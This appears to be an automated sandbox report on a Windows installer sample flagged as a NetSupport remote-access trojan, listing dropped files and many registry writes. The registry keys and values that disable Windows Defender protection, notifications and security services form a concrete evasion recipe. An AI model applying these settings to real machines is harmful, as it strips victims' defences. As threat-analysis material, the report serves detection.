Malware Analysis Report

2025-04-13 09:52

Sample ID 230709-3rxfcsha9v
Target Air Cluster Pro 130.exe
SHA256 47eb4710f7de558af843178388748abd984027eb76cdd1b6ff50fa8257babeed
Tags
netsupport discovery evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

47eb4710f7de558af843178388748abd984027eb76cdd1b6ff50fa8257babeed

Threat Level: Known bad

The file Air Cluster Pro 130.exe was found to be: Known bad.

Malicious Activity Summary

netsupport discovery evasion rat trojan

NetSupport

Modifies Windows Defender notification settings

Modifies security service

Modifies Windows Defender Real-time Protection settings

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Windows security modification

Checks installed software on the system

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

NSIS installer

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-09 23:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-09 23:45

Reported

2023-07-09 23:48

Platform

win10-20230703-en

Max time kernel

71s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\System32\Conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\System32\Conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" C:\Windows\system32\DllHost.exe N/A

Modifies Windows Defender notification settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\SysWOW64\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

NetSupport

rat netsupport

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
N/A N/A C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\DisableAntiVirus = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-DLQVL.tmp C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mfcm140.dll C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\ODISSDK.dll C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\DMReportSnapshot.dll C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\Air Cluster Pro 130.exe\is-KUGKJ.tmp C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mpnfimp.dll C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-E3T9M.tmp C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-NCNS5.tmp C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-N1EFL.tmp C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-8J05F.tmp C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
File opened for modification C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\cnpacnoc.dll C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-A7BIE.tmp C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Logs\DPX\setupact.log C:\Windows\SysWOW64\expand.exe N/A
File opened for modification C:\Windows\Logs\DPX\setuperr.log C:\Windows\SysWOW64\expand.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\reg.exe N/A
